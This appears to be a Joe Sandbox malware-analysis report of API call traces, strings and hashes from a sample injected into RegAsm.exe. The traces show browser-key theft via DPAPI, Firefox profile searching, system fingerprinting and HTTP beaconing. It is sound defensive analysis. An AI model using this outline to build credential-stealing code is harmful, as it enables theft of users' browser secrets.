Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$OpenQueryValue_memset
String ID:
API String ID: 3357907479-0
Opcode ID: d6787767246ba7689e682c1e86132e0f69a0e73b45a8a6a8e6d2467a8abaf605
Instruction ID: 7d9179e97a70292adf1590acc10b620403b390637df95d706c0004d2ee2d1654
Opcode Fuzzy Hash: d6787767246ba7689e682c1e86132e0f69a0e73b45a8a6a8e6d2467a8abaf605
Instruction Fuzzy Hash: 6D41AE3284021D9FCB10EF60EC86EE87B7AFB08309F0000EAA519A31A1DE349EC59F54

Function 0041BB1F Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,75BF74F0,?,0041CAEC,?,0041CB7A,00000000,06400000,00000003,00000000,00417493,.exe,00436C5C), ref: 0041BB6C
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,75BF74F0,?,0041CAEC,?,0041CB7A,00000000,06400000,00000003,00000000), ref: 0041BBA4

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction ID: b7d053da430baca786e743a82c4291bdbbeedc0934cf3e5aa9dd0c0159ab2a0c
Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction Fuzzy Hash: 453198B0505704DFDB308F259994BA3B6E8E715318F108A3FE1D786A50E778A8C4CBDA

Function 00404AB6 Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID:
API String ID: 1274457161-0
Opcode ID: 56643da10f4b7445f56efbfe023745c0132134aa5080287123ae14cd4d104b45
Instruction ID: 6e081b62b8053d9794d13bc0527b01ff92dbb3ede761053cf4382ccde041f189
Opcode Fuzzy Hash: 56643da10f4b7445f56efbfe023745c0132134aa5080287123ae14cd4d104b45
Instruction Fuzzy Hash: B1011E72D00218ABCB149BA9DC45ADEBFB8EF55330F108216F925F72E0DB745A058F94

Function 004083D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?), ref: 004083F2

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417088,004366B2,004366AF,?,?,?,?,0041848C), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417088,004366B2,004366AF,?,?,?,?,0041848C), ref: 00410581

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004174FD,004366B7), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

SetEnvironmentVariableA.KERNEL32(?,00437194,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00436713), ref: 00408447
LoadLibraryA.KERNEL32 ref: 0040845B

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004083E6, 004083EB, 00408405

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-1193256905
Opcode ID: 2e21e28f507c39484521a3c1586889621c998dc4ba89187e40d3cea18011f375
Instruction ID: 6459db7b08585d94503098ebf536d8a02cccf060ccc14feb2cd5168a6bd8d369
Opcode Fuzzy Hash: 2e21e28f507c39484521a3c1586889621c998dc4ba89187e40d3cea18011f375
Instruction Fuzzy Hash: 83314B71940714AFCB12AB6AED0265D7FA2EB48706B1061BBE540B3271DF791E81CF89

Function 00416CDA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00416CE1
lstrlenA.KERNEL32(?,0000001C), ref: 00416CEC
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416D70

Strings

ERROR, xrefs: 00416D68

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchlstrlen
String ID: ERROR
API String ID: 591506033-2861137601
Opcode ID: c1cfd3f1b0a4baaed24b1da3ea02ee29ce6dc5167646688f6e98769cd78a7726
Instruction ID: 9615ff736740aa9f2eda619d49902944c9594fa3e740c0795fc7a89e10e88f0c
Opcode Fuzzy Hash: c1cfd3f1b0a4baaed24b1da3ea02ee29ce6dc5167646688f6e98769cd78a7726
Instruction Fuzzy Hash: D0114271900609AFCB40FF75D9066DDBBB1FF04318B50413AE414A3551DB78E9959FC9

Function 00412446 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,0041487A), ref: 00412460
WriteFile.KERNEL32(00000000,?,?,zHA,00000000,?,?,0041487A), ref: 00412487
CloseHandle.KERNEL32(00000000,?,?,0041487A), ref: 0041249E

Strings

zHA, xrefs: 0041247C, 0041247F

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: zHA
API String ID: 1065093856-2673639583
Opcode ID: bc6402f38918b380715e77b6419ee6c76ea7fea9ea64abd39847ca25ac0ce84b
Instruction ID: 4f0310f3b6e4369799b601605143c948ee31b4001eb5a69f4f8d68be58c14fee
Opcode Fuzzy Hash: bc6402f38918b380715e77b6419ee6c76ea7fea9ea64abd39847ca25ac0ce84b
Instruction Fuzzy Hash: B8F0B471200218BFEB01AFA4DD8AFEB3B9CDB15399F000122F951E7190D7A59D515BA4

Function 0041224A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
CloseHandle.KERNEL32(00000000), ref: 0041228E

Strings

=A, xrefs: 0041225D, 00412262

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID: =A
API String ID: 3183270410-2399317284
Opcode ID: 5ff883e49e8dc8f7d9de2c9cb9413f34f83e056101f16b973a3434a2e28e8bde
Instruction ID: 563d35e78998c708a30fea4bf9e9633d4ccdcb7221a7e2a2431606a11072d542
Opcode Fuzzy Hash: 5ff883e49e8dc8f7d9de2c9cb9413f34f83e056101f16b973a3434a2e28e8bde
Instruction Fuzzy Hash: 44F0B471600318ABD710EB68DC45FEE7BB8DB88B14F0000AAB645D7280CFB4D9C58B54

Function 0040D40E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417535), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,004166FB,?), ref: 00411E37

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004174FD,004366B7), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

StrStrA.SHLWAPI(00000000,?,00437538,0043686F), ref: 0040D49F
lstrlenA.KERNEL32(?), ref: 0040D4B2

Strings

moz-extension+++, xrefs: 0040D4DD
^userContextId=4294967295, xrefs: 0040D4D7

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 161838763-3310892237
Opcode ID: 2606974610650b769e9de50f89b556e28336844c59287bb62ed27026e085f46e
Instruction ID: a434272de8af45a18885f40d6c2b7cca40e861c69af38f4ae0e30ba40b3fa933
Opcode Fuzzy Hash: 2606974610650b769e9de50f89b556e28336844c59287bb62ed27026e085f46e
Instruction Fuzzy Hash: 4341DB76A001199BCF11FBA6DD465CD77B5AF04308F51003AFD40B7192DBB8AE4D8AE9

Function 0040819F Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,004166FB,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 004081E5

Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093

Part of subcall function 004080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004080C4
Part of subcall function 004080A1: LocalAlloc.KERNEL32(00000040,?), ref: 004080D8
Part of subcall function 004080A1: LocalFree.KERNEL32(?), ref: 004080FD

Strings

"encrypted_key":", xrefs: 004081DF
, xrefs: 00408241
DPAPI, xrefs: 0040821B

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2311102621-738592651
Opcode ID: 48a5a7da1eb6dec976c1c4c989f01e4e78a39a2f359570bf65ae905978d61f4a
Instruction ID: da1a7ccb0e4cee18e0713caf01393873f55320ce02da929de0d2dc96ebad3d08
Opcode Fuzzy Hash: 48a5a7da1eb6dec976c1c4c989f01e4e78a39a2f359570bf65ae905978d61f4a
Instruction Fuzzy Hash: DF21B032A40209ABDF10EBA1DD41ADE7774AF41364F2045BEE950B72D0DF389A49CA58

Function 00410F51 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: c3efa6542a8ffda2395270d44855df142a38e3512cd13be69c5f1eb7cce9328d
Instruction ID: 026c0196830aaff71666b23a8161f374d89341781d18edff423d80af027cc5de
Opcode Fuzzy Hash: c3efa6542a8ffda2395270d44855df142a38e3512cd13be69c5f1eb7cce9328d
Instruction Fuzzy Hash: 8EF03075640304BFEB115B90EC0EFAA7FBAEB44752F1000A4F601A61A0DBB15940DB64

Function 61E4928D Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 309fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 61E4947D

Strings

exclusive, xrefs: 61E493FC
winOpen, xrefs: 61E49605

Memory Dump Source

Source File: 00000003.00000002.2738090816.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000003.00000002.2738054862.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739160997.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739206488.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739340756.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739385954.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739457247.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2739536722.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_61e00000_RegAsm.jbxd

Similarity

API ID: CreateFile
String ID: exclusive$winOpen
API String ID: 823142352-1568912604
Opcode ID: 7d3127bfc72fd4347ba9476b2ac7c084b3948183d245d4630441bdbfc634faf7
Instruction ID: ddd978882cd5270fa8f94071a9300b4b805ea89cb158bd2aa8a7dfbc70792811
Opcode Fuzzy Hash: 7d3127bfc72fd4347ba9476b2ac7c084b3948183d245d4630441bdbfc634faf7
Instruction Fuzzy Hash: B4D1A2709047499FDB10DFA9D58478EBBF0AF88318F208929E868EB394E774D985CF41

Function 00416608 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417535), ref: 00410538

Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00406A7D
Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC

StrCmpCA.SHLWAPI(?,ERROR), ref: 0041663D

Strings

ERROR, xrefs: 00416660
ERROR, xrefs: 00416635

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
String ID: ERROR$ERROR
API String ID: 3086566538-2579291623
Opcode ID: 40f9f930904c6f1e7f44892590f2669cf856bd0b95a420ad3cb379fce59b0549
Instruction ID: 49e7a0d0bc814a0e76f1e1e61a38292ba7aa3d89663ab21342588c4d554968a1
